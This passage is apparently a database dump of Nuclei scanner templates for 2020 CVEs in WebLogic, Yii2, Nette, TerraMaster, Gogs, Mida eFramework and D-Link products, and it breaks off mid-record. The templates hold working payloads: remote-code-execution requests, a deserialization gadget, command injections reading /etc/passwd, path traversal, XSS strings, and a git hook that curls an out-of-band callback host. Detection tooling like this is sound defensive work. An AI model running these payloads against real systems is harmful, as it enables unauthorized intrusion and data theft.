"CVE-2020-14882.yaml", "content": "id: CVE-2020-14882\n\ninfo:\n name: Oracle Weblogic Server - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to 
compromise the server.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.\n remediation: |\n Apply the latest security patches provided by Oracle to fix the vulnerability.\n reference:\n - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf\n - https://www.oracle.com/security-alerts/cpuoct2020.html\n - https://twitter.com/jas502n/status/1321416053050667009\n - https://youtu.be/JFVDOIL0YtA\n - https://github.com/jas502n/CVE-2020-14882#eg\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14882\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-14882\n epss-score: 0.9739\n epss-percentile: 0.99906\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: weblogic_server\n tags: cve2020,cve,oracle,rce,weblogic,oast,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"ADMINCONSOLESESSION\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n# digest: 4a0a0047304502210095d334a35f712502dc1161437a7636b7816e79ffa45dee8b16943efbfa63e27e022060fcc3b18130248421a20581edc7d0a8925ec9748890b716418f0e3975cddb70:922c64590222798bb761d5b6d8e72950", "hash": "36bcf1ce635b7c8f6abce699b212c967", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308197" }, "name": "CVE-2020-14883.yaml", "content": "id: CVE-2020-14883\n\ninfo:\n name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution\n author: pdteam,vicrack\n severity: high\n description: |\n The 
Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883\n - https://www.oracle.com/security-alerts/cpuoct2020.html\n - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html\n - https://github.com/1n7erface/PocList\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-14883\n epss-score: 0.97498\n epss-percentile: 0.99975\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: weblogic_server\n shodan-query: title:\"Oracle PeopleSoft Sign-in\"\n tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm\nvariables:\n str: \"{{randstr}}\"\n revstr: \"{{reverse(str)}}\"\n\nhttp:\n - raw:\n # CMD: String cmd = req.getHeader(\"CMD\");String[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? 
new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd}; String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\"\\\\A\").next();\n - |\n POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n\n test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"ADMINCONSOLESESSION\"\n\n - type: word\n part: body\n words:\n - \"{{revstr}}\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220201e093d509e8e0c30a242162cc25c66bbca2852bce51d080ac71d69be11f54a022100f450f10b27a270dfab8c3a426da77b84ef41ddae569328908bb2dbd2541fc858:922c64590222798bb761d5b6d8e72950", "hash": "bcfdff182da63468fa8babae9daddd16", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308198" }, "name": "CVE-2020-15050.yaml", "content": "id: CVE-2020-15050\n\ninfo:\n name: Suprema BioStar <2.8.2 - Local File Inclusion\n author: gy741\n 
severity: high\n description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability.\n reference:\n - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html\n - https://www.supremainc.com/en/support/biostar-2-pakage.asp\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15050\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-15050\n cwe-id: CWE-22\n epss-score: 0.55214\n epss-percentile: 0.97597\n cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: supremainc\n product: biostar_2\n tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../../../../../../../../../../../windows/win.ini\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a00463044022027582fd4cb0e0721dcad8ad6dedd262cd3be8b49cf72e43e17a2d9945178024a02205c1ba847b18c648f8f13e7cd4e6e20f76079e24b2801869c1f78c3d40cc310ba:922c64590222798bb761d5b6d8e72950", "hash": "5df3b2f31f6c3947c6a6d8f2deb7f772", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308199" }, "name": "CVE-2020-15129.yaml", "content": "id: CVE-2020-15129\n\ninfo:\n name: Traefik - Open Redirect\n author: dwisiswant0\n severity: medium\n description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can manipulate the redirect URL and trick users into visiting malicious websites.\n remediation: |\n Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik\n - https://github.com/containous/traefik/releases/tag/v2.2.8\n - https://github.com/containous/traefik/pull/7109\n - https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15129\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.7\n cve-id: CVE-2020-15129\n cwe-id: CWE-601\n epss-score: 0.00701\n epss-percentile: 0.7816\n cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: traefik\n product: traefik\n tags: cve,cve2020,traefik,redirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n headers:\n X-Forwarded-Prefix: \"https://foo.nl\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Found\"\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100c07d30a11232f3e470a77e9b15505d72e8fc22a911ac0d5c2acb28c4edf0400c022100fd575518d252dd3b4ab85b454ff6dac82e4164a2ce65d90dbf7777e8baafbcd3:922c64590222798bb761d5b6d8e72950", "hash": "f539fb25952921757bce7a783dfa8521", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819a" }, "name": "CVE-2020-15148.yaml", "content": "id: CVE-2020-15148\n\ninfo:\n name: Yii 2 < 2.0.38 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.\n impact: |\n Successful exploitation of this vulnerability could 
allow an attacker to execute arbitrary code on the affected system.\n remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.\n reference:\n - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943\n - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md\n - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99\n - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-15148\n cwe-id: CWE-502\n epss-score: 0.02081\n epss-percentile: 0.88831\n cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: yiiframework\n product: yii\n tags: cve,cve2020,rce,yii,yiiframework\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"total\"\n - \"An internal server error occurred.\"\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022072e95910e14d9ff1be082249e18d6eea72399f1c598e54a6ab12d28549385947022100820179b216116490ccb55a2625b7ae18f47362e1b8e8ec0b6b9f62583b5165a2:922c64590222798bb761d5b6d8e72950", "hash": "84c525b09d778872a689fe4ab5f6dc23", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819b" }, 
"name": "CVE-2020-15227.yaml", "content": "id: CVE-2020-15227\n\ninfo:\n name: Nette Framework - Remote Code Execution\n author: becivells\n severity: critical\n description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability.\n reference:\n - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94\n - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15227\n - https://lists.debian.org/debian-lts-announce/2021/04/msg00003.html\n - https://packagist.org/packages/nette/application\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15227\n cwe-id: CWE-94,CWE-74\n epss-score: 0.97285\n epss-percentile: 0.99849\n cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nette\n product: application\n fofa-query: app=\"nette-Framework\"\n tags: cve2020,cve,nette,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nette.micro/?callback=phpcredits\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PHP Credits\"\n\n - type: word\n part: header\n words:\n - \"Nette Framework\"\n# digest: 4b0a00483046022100ac87b598c9067d033995e435c1dcfe2b0a70b19bfcf75c66a3f4d747c6eeeccf022100f651a9eeb8c2b466377b7f3e42ef74086dbc33dbe6c116e69b13f39f71622087:922c64590222798bb761d5b6d8e72950", "hash": 
"93a438f17f7b955b4c805fc6d61926af", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819c" }, "name": "CVE-2020-15500.yaml", "content": "id: CVE-2020-15500\n\ninfo:\n name: TileServer GL <=3.0.0 - Cross-Site Scripting\n author: Akash.C\n severity: medium\n description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/maptiler/tileserver-gl/issues/461\n - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15500\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-15500\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58865\n cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tileserver\n product: tileservergl\n tags: cve,cve2020,xss,tileserver,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"'>\\\"\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b82ba9a13156e4a5f1bb8fd1ad13f264d34bd2681f97b51a91d33f002823962a02206f63f05020c012282120b381b87214144f8585fc8d81b8e61d1b1614ca448dae:922c64590222798bb761d5b6d8e72950", "hash": "05b3fc304e2e06b3271c09af0726b76f", "level": 4, 
"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819d" }, "name": "CVE-2020-15505.yaml", "content": "id: CVE-2020-15505\n\n# THIS TEMPLATE IS ONLY FOR DETECTING\n# To carry out further attacks, please see reference[2] below.\n# This template works by passing a Hessian header, otherwise;\n# it will return a 403 or 500 internal server error. Reference[3].\ninfo:\n name: MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the MobileIron infrastructure.\n remediation: |\n Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively\n reference:\n - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html\n - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505\n - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10\n - https://github.com/orangetw/JNDI-Injection-Bypass\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15505\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15505\n cwe-id: CWE-706\n epss-score: 0.97516\n epss-percentile: 0.99983\n cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mobileiron\n product: core\n tags: cve,cve2020,mobileiron,rce,sentry,kev\n\nhttp:\n - raw:\n - |\n POST 
/mifs/.;/services/LogService HTTP/1.1\n Host: {{Hostname}}\n Referer: https://{{Hostname}}\n Content-Type: x-application/hessian\n Connection: close\n\n {{hex_decode('630200480004')}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/x-hessian\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cb486e35255661a61a9ea7919efde1778d1751b33daf11bdaeb7a8a0c6160013022054afe621fe262980cad5294740be6a4a1e8b4f36a802e5ff1e9532038c5e269c:922c64590222798bb761d5b6d8e72950", "hash": "4759243348916c5fb02ee339f43d3ce9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819e" }, "name": "CVE-2020-15568.yaml", "content": "id: CVE-2020-15568\n\ninfo:\n name: TerraMaster TOS <.1.29 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15568\n - https://help.terra-master.com/TOS/view/\n - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568\n - https://github.com/n0bugz/CVE-2020-15568\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15568\n cwe-id: CWE-913\n epss-score: 0.96623\n epss-percentile: 0.99607\n cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: terra-master\n product: tos\n 
tags: cve2020,cve,terramaster,rce,terra-master\nvariables:\n filename: \"{{to_lower(rand_text_alpha(4))}}\"\n\nhttp:\n - raw:\n - |\n GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{(unknown)}.txt HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n - |\n GET /include/{(unknown)}.txt HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e784ad89af5c1b2c38362287c06a1f7f2ca94adb7a0d811daa81a252f34d401a02200ff9efa5d31f67a479a8e9292f31942deaf5c74cd69d13305223e94c25c60ac8:922c64590222798bb761d5b6d8e72950", "hash": "cfc95507fae01a26d004e2cf54b4d2f6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819f" }, "name": "CVE-2020-15867.yaml", "content": "id: CVE-2020-15867\n\ninfo:\n name: Gogs 0.5.5 - 0.12.2 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. 
NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a \"product UI does not warn user of unsafe actions\" issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later).\n reference:\n - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html\n - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/\n - http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15867\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-15867\n epss-score: 0.96659\n epss-percentile: 0.99554\n cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 7\n vendor: gogs\n product: gogs\n tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive\n\nhttp:\n - raw:\n - |\n GET /user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n - |\n GET /repo/create HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /repo/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n - |\n POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n - |\n GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: 
{{Hostname}}\n - |\n POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: body_1\n words:\n - content=\"Gogs\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - name=\"_csrf\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: auth_csrf\n group: 1\n regex:\n - name=\"_csrf\" content=\"(.*)\"\n internal: true\n\n - type: regex\n name: last_commit\n group: 1\n regex:\n - name=\"last_commit\" value=\"(.*)\"\n internal: true\n# digest: 4a0a004730450221009a215b7c44f2fb218def60e0d879afe798183c5f934d27d519c1f12a15ae90bd022071abea3ccb7139b8aaf1d296ad270e2afd6df803ea81281e87c092e97711d955:922c64590222798bb761d5b6d8e72950", "hash": "d353285bca3adb3c8fef6b0713a3166a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a0" }, "name": "CVE-2020-15895.yaml", "content": "id: CVE-2020-15895\n\ninfo:\n name: D-Link DIR-816L 2.x - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. 
An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest firmware update provided by D-Link to mitigate this vulnerability.\n reference:\n - https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15895\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-15895\n cwe-id: CWE-79\n epss-score: 0.00187\n epss-percentile: 0.55045\n cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dir-816l_firmware\n shodan-query: html:\"DIR-816L\"\n tags: cve2020,cve,dlink,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/info.php?RESULT=\\\",msgArray);alert(document.domain);//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \";alert(document.domain);\"\n - \"DIR-816L\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cc380765700ef1b2b7da3e313af50c0fde3da0fbfcd22a8d457ce221e7fc062b022054cf01c8bbed23df43e959ca8c4f1ca8a91b866aabce40c770d01b43ec7468eb:922c64590222798bb761d5b6d8e72950", "hash": "2f82c7b0c3d0b08ba1b72ec1278ea8a8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a1" }, "name": "CVE-2020-15920.yaml", "content": "id: 
CVE-2020-15920\n\ninfo:\n name: Mida eFramework <=2.9.0 - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability.\n reference:\n - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html\n - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15920\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15920\n cwe-id: CWE-78\n epss-score: 0.9722\n epss-percentile: 0.998\n cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: midasolutions\n product: eframework\n tags: cve2020,cve,mida,rce,packetstorm,midasolutions\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206f5a3ec45a1ae6604575d375e689df1c77957a24b7578c7ad5847a39d7570683022100cfa88e83a5104ca5de5e02b21eadad357a26dd37838c9c77f95c643dc5296f39:922c64590222798bb761d5b6d8e72950", "hash": "27852d8b9d38dd8db42ab8e6219f0db6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081a2" }, "name": "CVE-2020-16139.yaml", "content": "id: CVE-2020-16139\n\ninfo:\n name: Cisco Unified IP Conference Station 7937G - Denial-of-Service\n author: 
